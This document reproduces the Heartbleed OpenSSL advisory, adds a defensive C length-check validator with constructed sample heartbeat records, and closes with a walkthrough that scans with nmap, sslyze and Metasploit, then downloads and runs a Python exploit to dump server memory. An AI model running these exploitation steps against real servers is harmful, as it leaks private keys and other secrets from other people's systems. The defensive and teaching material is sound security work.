The (1) TLS and (2) DTLS implementations in OpenSSL 1.0.1 before 1.0.1g do not properly handle Heartbeat Extension packets, which allows remote attackers to obtain sensitive information from process memory via crafted packets that trigger a buffer over-read, as demonstrated by reading private keys, related to d1_both.c and t1_lib.c, aka the Heartbleed bug.

OpenSSL 1.0.1f, 1.0.1e, 1.0.1d, 1.0.1c, 1.0.1b, 1.0.1a, and 1.0.1 are vulnerable.
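The over-read described above comes from trusting the heartbeat message's own payload-length field. As an added example (not OpenSSL's own code), the length check that 1.0.1g introduced, written as a stand-alone validator a defender can run over captured heartbeat records; the sample records are constructed, not real captures.

```c
#include <stddef.h>
#include <stdint.h>

/* Added example, not OpenSSL's code.  A TLS heartbeat message is
 *   type(1) | payload_length(2, big-endian) | payload | padding(>=16)
 * OpenSSL before 1.0.1g trusted payload_length and copied that many
 * bytes into the response even when the record was shorter, reading
 * past the record into process memory.  The 1.0.1g fix compares the
 * declared length with the record length first; hb_validate does the
 * same check stand-alone so it can be run over captured records. */

#define HB_REQUEST  1
#define HB_RESPONSE 2
#define HB_PADDING  16   /* minimum padding required by RFC 6520 */

enum hb_verdict { HB_OK = 0, HB_TOO_SHORT, HB_BAD_TYPE, HB_OVERREAD };

/* Returns HB_OVERREAD for the Heartbleed shape: a declared payload
 * that does not fit inside the record that actually arrived. */
enum hb_verdict hb_validate(const uint8_t *rec, size_t rec_len,
                            uint16_t *payload_len_out)
{
    /* Header plus padding must fit even for an empty payload. */
    if (rec_len < 1 + 2 + HB_PADDING)
        return HB_TOO_SHORT;
    if (rec[0] != HB_REQUEST && rec[0] != HB_RESPONSE)
        return HB_BAD_TYPE;

    uint16_t payload_len = (uint16_t)((rec[1] << 8) | rec[2]);
    if (payload_len_out)
        *payload_len_out = payload_len;

    /* The missing check: 1 + 2 + payload + 16 <= record length.
     * Without it, memcpy() copied payload_len bytes regardless. */
    if ((size_t)1 + 2 + payload_len + HB_PADDING > rec_len)
        return HB_OVERREAD;
    return HB_OK;
}

/* Constructed sample records (not real captures). */
static const uint8_t hb_benign[] = {
    0x01, 0x00, 0x03, 'a', 'b', 'c',       /* request, 3-byte payload */
    0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 /* 16 bytes padding */
};
static const uint8_t hb_overread[] = {
    0x01, 0xff, 0xff,                      /* claims 65535-byte payload */
    0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 /* only padding follows */
};
```

The same comparison is what network IDS signatures for Heartbleed implement: flag a heartbeat whose declared payload length exceeds the TLS record that carried it.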


1. Scan for the vulnerability

  • nmap --script ssl-heartbleed

In this case Nmap reports the host as vulnerable.

  • sslyze --heartbleed

SSLyze, oddly, reports it as not vulnerable; this can serve as an additional test.

Running the scan with Metasploit:

  • msfconsole
  • search heartbleed
  • use auxiliary/scanner/ssl/openssl_heartbleed

  • show options
  • set RHOSTS
  • exploit

As the host shows as vulnerable to ssl-heartbleed, we run a Python script against it.

2. Download the exploit

  • wget
  • ls

3. Running

  • python

  • python heartbleed -n 100

Memory is leaked, and we can see an interesting base64 string in it. Data like this can turn up in the dump.

This value can be changed to inspect larger or shorter pieces of memory.

  • vi


Updates are available. Please see the references or vendor advisory for more information.